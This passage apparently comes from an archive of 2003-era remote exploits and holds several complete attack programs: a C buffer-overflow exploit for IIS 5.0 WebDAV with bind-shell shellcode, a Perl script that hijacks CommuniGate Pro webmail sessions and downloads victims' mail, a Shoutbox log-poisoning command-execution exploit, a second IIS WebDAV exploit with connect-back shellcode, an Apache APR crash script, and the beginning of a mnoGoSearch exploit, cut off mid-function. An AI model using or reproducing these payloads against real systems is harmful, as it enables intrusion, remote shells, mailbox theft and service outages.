"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";
/* Our code starts here */
int main (int argc, char **argv)
{
unsigned long ret;
unsigned short port;
int tport, bport, s, i, j, r, rt=0;
struct hostent *h;
struct sockaddr_in dst;
char buffer[MAXBUF];
if (argc < 2 || argc > 5)
{
printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <[email protected]>. 23/03/2003\nUsage: %s <target host> [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET);
exit(-1);
}
// Default target port = 80
if (argc > 2)
tport = atoi(argv[2]);
else
tport = 80;
// Default bind port = 31337
if (argc > 3)
bport = atoi(argv[3]);
else
bport = 31337;
// Default ret value = RET
if (argc > 4)
ret = strtoul(argv[4], NULL, 16);
else
ret = RET;
if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 )
{
fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n");
exit(-2);
}
// Shellcode patching
port = htons(bport);
port ^= 0x9999;
if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) )
{
fprintf(stderr, "Binding-port contains null-byte. Use another port.\nAborted!\n");
exit(-3);
}
*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
*(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
// If the last two items contain any null-bytes, exploit will fail.
// WARNING: this check is not performed here. Be careful and check it for yourself!
// Resolve hostname
printf(" Resolving hostname ...\n");
if ((h = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "%s: unknown hostname\n", argv[1]);
exit(-4);
}
bcopy(h->h_addr, &dst.sin_addr, h->h_length);
dst.sin_family = AF_INET;
dst.sin_port = htons(tport);
// Socket creation
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("Failed to create socket");
exit(-5);
}
// Connection
if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)
{
perror("Failed to connect");
exit(-6);
}
// Build malicious string...
printf(" Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1], ((ret >> 8) & 0xff), ret & 0xff);
bzero(buffer, MAXBUF);
strcpy(buffer, "SEARCH /");
i = strlen(buffer);
buffer[i] = NOP; // Align for RET overwrite
// Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill some more bytes ;-)
for (j=i+1; j < i+2150; j+=2)
*(unsigned short *)&buffer[j] = (unsigned short)ret;
// The rest is padded with NOP's. RET address should point to this zone!
for (; j < i+65535-strlen(jumpcode); j++)
buffer[j] = NOP;
// Then we skip the body of the HTTP request
memcpy(&buffer[j], jumpcode, strlen(jumpcode));
strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode));
strcpy(buffer+strlen(buffer), body);
// This byte is used to mark the beginning of the shellcode
memset(buffer+strlen(buffer), 0x01, 1);
// And finally, we land into our shellcode
memset(buffer+strlen(buffer), NOP, 3);
strcpy(buffer+strlen(buffer), shellcode);
// Send request
if (send(s, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("Failed to send");
exit(-7);
}
printf(" Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport);
// Receive response
while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0)
rt += r;
// This code is not bullet-proof. An evil WWW server could return a response bigger than MAXBUF
// and an overflow would occur here. Yes, I'm lazy... :-)
buffer[rt] = '\0';
if (rt > 0)
printf(" Victim server issued the following %d bytes of response:\n--\n%s\n--\n Server NOT vulnerable!\n", rt, buffer);
else
printf(" Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport);
close(s);
}
// [2003-03-24]
80 CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit
#!/usr/bin/perl
# Below is exploit code. Place it into cgi-bin, then
# (recommended) make symlink from
# DocumentRoot/AnyImage.gif to shj.pl, configure
# at least $url variable, and possible other vars and
# send victim HTML message with img src to your
# AnyImage.gif. When victim will read message, script
# will download messages 1..10 from his mailbox (if
# sucessfull).
# Script will work even if "require fixed address" option
# enabled (set $abuseproxy=1), but it needs access to
# users proxy (IP will be detected automatically). So, if
# your victim uses same corporate proxy as you, then
# you're lucky, you can own his mailbox! :)
# If victim uses HTTPS to access CGP webmail, use
# https:// link to image. some browsers will still send
# HTTP_REFERER if _both_ sites are https.
#
# session hijacking and mail downloading exploit for CommuniGatePro 4.0.6
#
# Yaroslav Polyakov. [email protected] www.sysAttack.com
#
use LWP::UserAgent;
# configuration vars
$logfile="/tmp/log";
$url="http://COMMUNIGATE/Session/%SID%/Message.wssp?Mailbox=INBOX&MSG=%N%";
$SIDREGEXP="Session/([0-9a-zA-Z\-]+)/";
$msglonum=1;
$msghinum=10;
$msgprefix="/tmp/hijacked-";
$abuseproxy=1;
$proxyport=3128;
sub printgif
{
$gif1x1="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\xff\x 00\xc0\xc0\xc0
\x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x 00\x00\x00\x00
\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b";
print "Content-Type: image/gif\n";
print "\n";
print "$gif1x1";
}
open LOG, "> $logfile" || die("cant write to my log");
printgif;
$remote=$ENV{'REMOTE_ADDR'};
$referer=$ENV{'HTTP_REFERER'};
print LOG "remote: $remote\nreferer: $referer\n";
# if($referer=~/SID=([0-9a-zA-Z\-]+)/){
if($referer=~/$SIDREGEXP/){
$SID=$1;
print LOG "SID: $SID\n";
}else{
print LOG "sorry, cant
find out SID\n";
exit;
}
# create request
my $ua = new LWP::UserAgent;
$ua->agent("shj - sysAttack CGP session HiJack/1.0");
if($abuseproxy){
print LOG "set proxy
http://$remote:$proxyport/\n";
$ua->proxy('http',
"http://$remote:$proxyport/");
}
for($index=$msglonum;$index<=$msghinum;$index++){
$eurl=$url;
$eurl =~ s/%N%/$index/;
$eurl =~ s/%SID%/$SID/;
print LOG "fetching $eurl\n";
$request = new HTTP::Request("GET", $eurl);
$response = $ua->request($request);
if($response){
print LOG
$response->code." ".$response->message
."\n";
open MSG, ">
$msgprefix$index" or die('cant crea
te $msgprefix$index');
print MSG
$response->content;
close MSG;
}else{
print LOG "undefined
response\n";
}
}
close LOG;
# [2003-05-05]
80 Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
#!/usr/bin/perl
#
# Webfroot Shoutbox < 2.32 on apache exploit
#
use IO::Socket;
my $host = "127.0.0.1";
my $port = 80;
my $shoutbox = "shoutbox.php?conf=";
my $shoutboxpath = "/shoutbox";
my $cmd = "ls -l";
my $conn;
my $type;
my @logs = (
"/etc/httpd/logs/acces_log",
"/etc/httpd/logs/acces.log",
"/var/www/logs/access_log",
"/var/www/logs/access.log",
"/usr/local/apache/logs/access_log",
"/usr/local/apache/logs/access.log",
"/var/log/apache/access_log",
"/var/log/apache/access.log",
"/var/log/httpd/access_log",
"/var/log/httpd/access.log",
#"D:/apps/Apache Group/Apache2/logs/access.log"
);
my $qinit = "GET /<?\$h=fopen('/tmp/.ex','w+');fwrite(\$h,'Result:<pre><?system(\$cmd);?>
</pre>');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n";
my $conn;
if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){
$type = $ARGV[0];
}
else {
print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\n";
print "Usage: \n Webfroot.pl (x|r) host [command] [path] [port]\n";
print "\ttype\tx = exploit | r = run command (after run with x option)\n";
print "\thost\thostname\n";
print "\tcommand\tcommand to execute on remote server\n";
print "\tpath\tpath to shoutbox installation ex: /shoutbox\n";
print "\tport\tport number\n";
exit;
}
if ($ARGV[1]){
$host = $ARGV[1];
}
if ($ARGV[2]){
$cmd = $ARGV[2];
}
if ($ARGV[3]){
$shoutboxpath = $ARGV[3];
}
if ($ARGV[4]){
$port = int($ARGV[4]);
}
$cmd =~ s/ /+/g;
sub connect_to {
#print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die " Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
}
sub connect_end {
#print "[x] Close connection\n";
close($conn);
}
sub exploit {
my $access_log = $_[0];
my $result = "";
$access_log =~ s/ /+/g;
my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\
nHost: $host\nConnection: Close\n\n";
print "$query";
print "[x] Access log : ", $access_log ,"\n";
&connect_to;
print $conn $query;
while ($line = <$conn>) {
$result = $line;
#print $result;
};
&connect_end;
}
sub run_cmd {
my $conf="/tmp/.ex";
#my $conf="d:/tmp/.ex";
my $result = "";
my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\
nHost: $host\nConnection: Close\n\n";
print "[x] Run command ...\n";
&connect_to;
print $conn $query;
while ($line = <$conn>) {
$result .= $line;
};
&connect_end;
if ($result =~ /Result:/){
print $result;
} else {
print $result;
print " Failed ...";
}
}
sub insert_code {
my $result = "";
print "[x] Access log : ", $access_log ,"\n";
print "[x] Insert php code into apache access log ...\n";
&connect_to;
print $conn "$qinit";
while ($line = <$conn>) {
$result .= $line;
};
&connect_end;
print $result;
}
if ($type eq "x"){
&insert_code;
print "[x] Trying to exploit ...\n";
for ($i = 0;$i <= $#logs; $i++){
&exploit($logs[$i]);
}
&run_cmd;
} else {
&run_cmd;
}
# [2003-05-29]
80 MS Windows WebDav II (New) Remote Root Exploit
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* 29/05/2003 - by Alumni - */
/* Microsoft IIS WebDAV New Exploit */
/* spawns shell on port 32768 */
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
#include <stdio.h>
#include <winsock.h>
#include <windows.h>
#define SHELLCODELEN 753
#define NOP 0x90
#define BUFFERLEN 1024
#define RET 0x41424344
#define GMHOFF 30
#define GPAOFF 38
#define IPOFF 161
#define DEFPORT 32768
//#define DEBUGGEE_FLOW // for debug only
#ifdef DEBUGGEE_FLOW
#define GMH (long)GetModuleHandle
#define GPA (long)GetProcAddress
#else
#define GMH 0x0100107C // GetModuleHandle@
#define GPA 0x01001034 // GetProcAddress@
#endif
#define XOROFF 11
#define SOFF 16
char prologue[] =
"\xEB\x03" // jmp $+3
"\x58" // pop eax
"\x50" // push eax
"\xC3" // retn
"\xE8\xF8\xFF\xFF\xFF" // call $-3
"\xB2" // mov dl, %key
"\x90" // %key
"\x33\xC9" // xor ecx, ecx
"\x66\xB9" // mov cx, shellcodesize
"\x04\x03" // shellcodesize = hex(SHELLCODELEN)
"\x04\x14" // add al, 0x14
"\x30\x10" // xor byte ptr[eax], dl
"\x40" // inc eax
"\x66\x49" // dec cx
"\x67\xE3\x02" // jcxz $+5
"\xEB\xF6" // jmp $-8
;
char shellcode[SHELLCODELEN+1] =
"\xe8\x5f\x02\x00\x00\x8b\xe8\x33\xf6\x66\xbe\x80"
"\x00\x03\xf4\xc7\x46\xf0\x00\x00\x00\x00\xc7\x46"
"\xf4\x00\x00\x00\x00\xb8\xf2\x12\x40\x00\x89\x46"
"\xf8\xb8\xf8\x12\x40\x00\x89\x46\xfc\x8b\xd5\x81"
"\xc2\x9e\x02\x00\x00\x52\xff\x56\xf8\x89\x46\xf4"
"\x8b\xd5\x81\xc2\xab\x02\x00\x00\x52\xff\x76\xf4"
"\xff\x56\xfc\x68\x00\x10\x00\x00\x6a\x40\xff\xd0"
"\x8b\xf8\x8b\xc7\x8b\xfe\x8b\xf0\x83\xc6\x20\x8b"
"\x47\xf8\x89\x46\xf8\x8b\x47\xf4\x89\x46\xf4\x8b"
"\x47\xfc\x89\x46\xfc\x8b\xd5\x81\xc2\x6e\x02\x00"
"\x00\x52\xff\x56\xf8\x89\x46\xf0\x8b\xd5\x81\xc2"
"\x7e\x02\x00\x00\x52\xff\x76\xf0\xff\x56\xfc\x8b"
"\xd8\x6a\x06\x6a\x01\x6a\x02\xff\xd3\x89\x06\x8b"
"\xd6\x83\xc2\x14\xb8"
"\x7f\x00\x00\x01" // put your ip here (run netcat before,
e.g. 127.0.0.1)
"\x89\x42\x04\x66\xc7\x02\x02\x00\x66\xb8"
"\x80\x00" // specify connectious port here (e.g.
32768)
"\x66\x89\x42"
"\x02\x8b\xd5\x81\xc2\x8a\x02\x00\x00\x52\xff\x76"
"\xf0\xff\x56\xfc\x8b\xd8\x6a\x10\x8b\xd6\x83\xc2"
"\x14\x52\xff\x36\xff\xd3\x83\xf8\xff\x0f\x84\x84"
"\x01\x00\x00\x8b\xd5\x81\xc2\x79\x02\x00\x00\x52"
"\xff\x76\xf0\xff\x56\xfc\x8b\xd8\x8b\xd6\x6a\x00"
"\x68\x64\x0f\x00\x00\x81\xc2\x9c\x00\x00\x00\x52"
"\xff\x36\xff\xd3\xc6\x84\x30\x9c\x00\x00\x00\x00"
"\xbb\x00\x00\x00\x00\x66\xb9\x0c\x00\x8a\x84\x2b"
"\x62\x02\x00\x00\x88\x84\x33\x90\x00\x00\x00\x43"
"\x66\x49\x66\x83\xf9\x00\x75\xe9\x8b\xfe\x81\xc7"
"\x84\x00\x00\x00\xc7\x07\x0c\x00\x00\x00\xc7\x47"
"\x04\x00\x00\x00\x00\xc7\x47\x08\x01\x00\x00\x00"
"\x8b\xfe\x8b\xd6\x8b\xce\x81\xc7\x84\x00\x00\x00"
"\x83\xc2\x0c\x83\xc1\x10\x6a\x00\x57\x51\x52\x8b"
"\xd5\x81\xc2\xc9\x02\x00\x00\x52\xff\x76\xf4\xff"
"\x56\xfc\x8b\xd8\xff\xd3\x8b\xfe\x83\xc7\x34\xc7"
"\x07\x44\x00\x00\x00\x66\xc7\x47\x30\x00\x00\xc7"
"\x47\x2c\x01\x01\x00\x00\x8b\x46\x10\x89\x47\x3c"
"\x89\x47\x40\x8b\xd6\x8b\xde\x8b\xce\x81\xc2\x90"
"\x00\x00\x00\x83\xc3\x34\x83\xc1\x78\x51\x53\x6a"
"\x00\x6a\x00\x6a\x00\x6a\x01\x6a\x00\x6a\x00\x52"
"\x6a\x00\x8b\xd5\x81\xc2\xd4\x02\x00\x00\x52\xff"
"\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5\x81"
"\xc2\xbd\x02\x00\x00\x52\xff\x76\xf4\xff\x56\xfc"
"\x8b\xd8\xff\x76\x10\xff\xd3\x8b\xd6\x83\xc2\x08"
"\x8b\xd5\x81\xc2\xb7\x02\x00\x00\x52\xff\x76\xf4"
"\xff\x56\xfc\x8b\xd8\x68\x88\x13\x00\x00\xff\xd3"
"\x8b\xd6\x8b\xce\x81\xc2\x90\x00\x00\x00\x83\xc1"
"\x08\x8b\x5e\x08\x6a\x00\x51\x68\x70\x0f\x00\x00"
"\x52\xff\x76\x0c\x8b\xd5\x81\xc2\xe3\x02\x00\x00"
"\x52\xff\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b"
"\xd6\x81\xc2\x90\x00\x00\x00\x6a\x00\xff\x76\x08"
"\x52\xff\x36\x8b\xd5\x81\xc2\x85\x02\x00\x00\x52"
"\xff\x76\xf0\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5"
"\x81\xc2\x92\x02\x00\x00\x52\xff\x76\xf0\xff\x56"
"\xfc\x8b\xd8\xff\x36\xff\xd3\xe9\x1c\xfe\xff\xff"
"\x58\x50\xc3\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x20\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c"
"\x4c\x00\x72\x65\x63\x76\x00\x73\x6f\x63\x6b\x65"
"\x74\x00\x73\x65\x6e\x64\x00\x63\x6f\x6e\x6e\x65"
"\x63\x74\x00\x63\x6c\x6f\x73\x65\x73\x6f\x63\x6b"
"\x65\x74\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x2e"
"\x44\x4c\x4c\x00\x47\x6c\x6f\x62\x61\x6c\x41\x6c"
"\x6c\x6f\x63\x00\x53\x6c\x65\x65\x70\x00\x43\x6c"
"\x6f\x73\x65\x48\x61\x6e\x64\x6c\x65\x00\x43\x72"
"\x65\x61\x74\x65\x50\x69\x70\x65\x00\x43\x72\x65"
"\x61\x74\x65\x50\x72\x6f\x63\x65\x73\x73\x41\x00"
"\x52\x65\x61\x64\x46\x69\x6c\x65\x00";
char xmlbody[] ="<?xml version=\"1.0\"?>\r\n<g:searchrequest
xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\nSelect \"DAV:displayname\"
from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";
long retaddr, buffsize;
char* buffer;
unsigned long getlocalhostip()
{
char buff[128];
in_addr inaddr;
if(!gethostname(buff,128))
{
memcpy(&inaddr,gethostbyname(buff)->h_addr,4);
return(inet_addr(inet_ntoa(inaddr)));
}
return (-1);
}
ULONG WINAPI AcceptThread(LPVOID lpParam)
{
int ln1;
unsigned long slisten, sacc;
sockaddr_in saddrin;
slisten = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (slisten!=INVALID_SOCKET)
{
saddrin.sin_addr.s_addr = INADDR_ANY;
saddrin.sin_family = AF_INET;
saddrin.sin_port = htons(DEFPORT);
bind(slisten,(struct sockaddr*)&saddrin,sizeof(saddrin));
listen(slisten,5);
while (1)
{
ln1 = sizeof(saddrin);
sacc = accept(slisten,(struct sockaddr*)
&saddrin,&ln1);
if (sacc!=INVALID_SOCKET)
{
printf("\n\nShell succesfully spawned on
remote host\nNetcat to %d",DEFPORT);
ExitProcess(0);
}
}
}
return (1);
}
ULONG SendRequest (char* sHost, int iPort)
{
char* buffsend;
struct sockaddr_in saddr_in;
int timeout;
unsigned long sock;
buffsend = (char*)malloc(buffsize+256);
memset(buffsend,0,buffsize+256);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
saddr_in.sin_addr.s_addr = inet_addr(sHost);
saddr_in.sin_family = AF_INET;
saddr_in.sin_port = htons(iPort);
if (!connect(sock,(struct sockaddr*)&saddr_in,sizeof(saddr_in)))
{
timeout = 5000;
setsockopt(sock,SOL_SOCKET,SO_RCVTIMEO,(char*)
&timeout,sizeof(timeout));
setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)
&timeout,sizeof(timeout));
sprintf(buffsend,"SEARCH / HTTP/1.1\r\nHost:%s\r\nContent-
Type: text/xml\r\nContent-Length: %d\r\n\r\n%s%s",strlen(xmlbody)+strlen
(buffer),xmlbody,buffer);
send (sock,buffsend,strlen(buffsend),0);
closesocket(sock);
}
else return(1);
return (0);
}
void dispUsage(char* str1)
{
printf ("IIS WebDAV exploit by Alumni - The Matrix Reloaded -\n");
printf ("Usage: %s <ipv4dot> <port> [<buffsize>] [<retaddr>]
\n\n",str1);
return;
}
int main(int argc, char** argv)
{
unsigned long uThread;
int prologuelen = 0, i;
char xorkey = 0;
long *ptr1;
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0),&wsadata);
buffsize = BUFFERLEN;
retaddr = RET;
#ifndef DEBUGGEE_FLOW
if (argc<3)
{
dispUsage(argv[0]);
return (1);
}
if (argc>=4) buffsize = atoi(argv[3]);
if (argc>=5) retaddr = atol(argv[4]);
#endif
buffer = (char*) malloc(buffsize+1);
ptr1 = (long*)buffer;
memset(buffer,0,buffsize);
CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)
AcceptThread,NULL,NULL,&uThread);
*(long*)(shellcode+GMHOFF) = GMH;
*(long*)(shellcode+GPAOFF) = GPA;
*(long*)(shellcode+IPOFF) = getlocalhostip();
for (i=0;i<256;i++)
{
int iBool = 1, j;
for (j=0;j<SHELLCODELEN;j++)
if ((shellcode[j]^i)==0 || (shellcode[j]^i)==0x0d
|| (shellcode[j]^i)==0x0a) iBool = 0;
if (iBool)
{
xorkey = i;
break;
}
}
for (i=0;i<SHELLCODELEN;i++) shellcode[i] ^= xorkey;
for (i=0;i<(buffsize-SHELLCODELEN)/2;i++) buffer[i] = NOP;
prologue[XOROFF] = xorkey;
*(short int*)(prologue+SOFF) = SHELLCODELEN;
strncat(buffer,prologue,buffsize);
prologuelen = strlen(buffer);
for (i=prologuelen;i<SHELLCODELEN+prologuelen;i++) buffer[i] =
shellcode[i-prologuelen];
prologuelen = strlen(buffer);
buffer[prologuelen] = NOP;
buffer[prologuelen+1] = NOP;
buffer[prologuelen+2] = NOP;
buffer[prologuelen+3] = NOP;
for (i=(prologuelen+3) & (~3);i<buffsize;i+=sizeof(retaddr)) *
(long*)(buffer+i) = retaddr;
buffer[buffsize] = 0;
printf ("%s",buffer);
#ifdef DEBUGGEE_FLOW
__asm {
mov eax, ptr1
call eax
}
#else
SendRequest(argv[1],atoi(argv[2]));
#endif
WSACleanup();
return (0);
}
// [2003-06-01]
80 Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
#!/usr/bin/perl
#
# Apache 2.0.37 - 2.0.45 APR Exploit
# Written By Matthew Murphy
#
# This Perl script will successfully exploit any un-patched Apache 2.x
# servers.
#
# Base64 Encoder
#
# If you want authentication with the server via HTTP's lame Basic
# auth, put the proper string to encode BASE64 content, and use
# '%s' to represent the credentials being encoded. For instance:
#
# base64 %s
#
# would result in:
#
# base64 userid:password
#
# If your decoder requires you to use STDIN to pass the password
# (no pun intended), set $BASE64_USE_STDIN to nonzero and do not
# use '%s' on the command-line.
$BASE64_CMD_STRING = "use_base64_encoder_here %s";
# Base64 encoder piping
#
# If your encoder requires the password to be written to STDIN,
# set this to a nonzero value. NOTE: This requires support for
# bi-directional pipes on your OS version.
$BASE64_USE_STDIN = 0;
# Base64 encoder input handling
#
# If your encoder requires a newline after your credentials,
# set this to your newline character.
$BASE64_WRITE_NL = "";
use IO::Socket;
print STDOUT "Apache 2.0 APR Exploit\r\n";
print STDOUT "By Matthew Murphy\r\n\r\n";
print STDOUT "Enter the hostname/IP address of the server: ";
$line = <STDIN>;
$host = mychomp($line);
print STDOUT "Enter the port of the server \[80\]: ";
$line = <STDIN>;
$port = mychomp($line);
print STDOUT "Use authentication credentials for the session \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
print STDOUT "What username shall we use: ";
$line = <STDIN>;
$user = mychomp($line);
print STDOUT "What password shall we use: ";
$line = <STDIN>;
$pass = mychomp($line);
$auth = "$user:$pass";
if ($BASE64_USE_STDIN) {
# l33t Perl piping trix; NOTE: This is definitely
# Alpha code! :-)
pipe(STDOUTREAD, STDOUTWRITE);
pipe(STDINREAD, STDINWRITE);
open(OLDSTDIN, "&STDIN");
open(OLDSTDOUT, ">&STDOUT");
open(STDIN, "&STDINREAD");
open(STDOUT, ">&STDOUTWRITE");
close(STDINREAD);
close(STDOUTWRITE);
system($BASE64_CMD_STRING);
open(STDIN, "&OLDSTDIN");
open(STDOUT, "&>OLDSTDOUT");
close(OLDSTDIN);
close(OLDSTDOUT);
print STDINWRITE $auth;
close(STDINWRITE);
read(STDOUTREAD, $base64, 4096); # Edit for insane passwords
close(STDOUTREAD);
} else {
open(READOUTPUT, sprintf($BASE64_CMD_STRING, $auth)."|");
read(READOUTPUT, $base64, 4096); # See above
close(READOUTPUT);
}
# Another hack for dealing with base64 encoders that output
# multi-lined encoded text. HTTP specifically calls for a
# single line. Note that this pattern also messes with spaces,
# tabs, etc., but base64 doesn't use those either, so this
# shouldn't matter.
$base64 = join("", split(/ /, $base64));
} else {
$base64 = undef;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"127.0.0.1");
print STDOUT "Exploiting a proxy server \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
print $f "GET / HTTP/1.1\x0d\x0a";
# Apache 2.0 tries to limit header inputs, but uses a hash table
# that ultimately concatenates multiple headers of the same name
# together with ", " between them, so:
#
# Host: a
# Host: b
#
# Bypasses Apache's buffer size checks, but ends up as:
#
# Host: a,b
#
# When processed. Confirm this with a TRACE against your server:
#
# TRACE / HTTP/1.1
# Host: a
# Host: b
#
# The "message/http" body you receive will contain:
#
# TRACE / HTTP/1.1
# Host: a,b
#
# So, for those of you who are confused by this code fragment,
# this is what it ultimately achieves!
for ($i = 0; $i < 10; $i++) {
print $f "Host: ".("A"x2000)."\r\n";
}
if (defined($base64)) {
print $f "Proxy-Authorization: Basic ".$base64."\r\n";
}
print $f "\r\n";
} else {
print STDOUT "What resource should be probed: ";
$line = <STDIN>;
$res = mychomp($line);
print STDOUT "Exploit a DAV repository for this attack? \[Y/N\] ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
# WARNING:
# Another section of alpha code here; mod_dav tends to barf
# if given the smallest inconsistency, and this is not
# exactly well-researched. If this doesn't work for you,
# target your DAV repository as a typical resource: if
# UseCanonicalName On hasn't been set explicitly, mod_dav
# will choke on that as well.
#
# STunnel should not have issues with this, as you can't
# use a "Host" header in an SSL connection anyway, so
# that is no problem.
#
# Note that if the body is too long, IIS servers will also
# die (assuming of course, that the latest IIS cumulative
# patch has not been applied), as they have had problems
# dealing with WebDAV in the very recent past.
# XML Body of Request
#
# If everything works, mod_dav will attempt to format a
# message with apr_psprintf() to indicate that our
# namespace is invalid, leading to a crash.
$xmlbody = "<?xml version=\"1.0\"?>\r\n";
$xmlbody.= "<D:propfind xmlns:D=\"".("A"x20000)."\:\">\r\n";
$xmlbody.= "\x20\x20\x20\x20<D:allprop/>\r\n";
$xmlbody.= "</D:propfind>";
# HTTP headers
print $f "PROPFIND $res HTTP/1.1\r\n";
print $f "Host: $host:$port\r\n";
print $f "Depth: 1\r\n";
print $f "Content-Type: text/xml; charset=\"utf-8\"\r\n";
print $f "Content-Length: ".length($body)."\r\n\r\n";
if (defined($base64)) {
print $f "Authorization: Basic ".$base64."\r\n";
}
print $f "$xmlbody\r\n\r\n";
} else {
# This does *almost* the exact same thing as the mod_proxy
# code, and could be considered wasteful, but a few extra
# CPU cycles never killed anybody. :-(
print $f "GET $res HTTP/1.1\r\n";
for ($i = 0; $i < 10; $i++) {
print $f "Host: ".("A"x2000)."\r\n";
}
if (defined($base64)) {
print $f "Authorization: Basic ".$base64."\r\n";
}
print $f "\r\n";
}
}
while (defined($ln = <$f>)) {
print STDOUT $ln;
}
undef $f;
exit;
# FIXED: The perl chomp() function is broken on my distro,
# so I hacked a fix to work around it. This note applies
# to ActivePerl 5.8.x -- I haven't tried others. This is
# another hackish fix, which seems to be the entire style
# of this code. I'll write better toys when I have time to
# write better toys.
sub mychomp {
my $data;
my $arg = shift;
my $CRLF;
if ($^O == "MSWin32") {
$CRLF = 1;
} else {
$CRLF = 0;
}
$data = substr($arg, 0, length($arg) - $CRLF);
return $data;
}
# [2003-06-08]
80 mnoGoSearch 3.1.20 Remote Command Execution Exploit
#!/usr/bin/perl
#
# [ reloaded ]
# Remote Exploit for mnoGoSearch 3.1.20 that performs
# remote command execution as the webserver user id
# for linux ix86
# by pokleyzz
#
use IO::Socket;
$host = "127.0.0.1";
$cmd = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;
my $conn;
if ($ARGV[0]){
$host = $ARGV[0];
}
else {
print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz\n\n";
print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
print "\thost\thostname to exploit\n";
print "\tcommand\tcommand to execute on server\n";
print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
print "\tport\tport to connect to\n";
print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
print "\tret\treturn address default bfffd0d0\n";
exit;
}
if ($ARGV[1]){
$cmd = $ARGV[1];
}
if ($ARGV[2]){
$searchpath = $ARGV[2];
}
if ($ARGV[3]){
$port = int($ARGV[3]);
}
if ($ARGV[4]){
$suffsize = int($ARGV[4]);
}
if ($ARGV[5]){
$rawret = hex_to_int($ARGV[5]);
}
#########~~ start function ~~#########
sub hex_to_int {
my $hs = $_[0];
$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) +
(hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
}
sub int_to_hex {
my $in = $_[0];
$hex = sprintf "%x",$in;
}
sub string_to_ret {
my $rawret = $_[0];
if (length($rawret) != 8){
print $rawret;
die " incorrect return address ...\n ";
} else {
$ret = chr(hex(substr($rawret, 2, 2)));
$ret .= chr(hex(substr($rawret, 0, 2)));
$ret .= chr(hex(substr($rawret, 6, 2)));
$ret .= chr(hex(substr($rawret, 4, 2)));
}
}
sub connect_to {
#print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die " Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
}
sub check_version {
my $result;
connect_to();
print "[x] Check if $host use correct version ...\n";
print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n";
# capture result
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
if ($result =~ /_test_/){
print "[x] Correct version detected .. possibly vulnerable ...\n";
} else {
print $result;
die "[x] New version or wrong url\n";
}
}
sub exploit {
my $rw = $_[0];
$result = "";
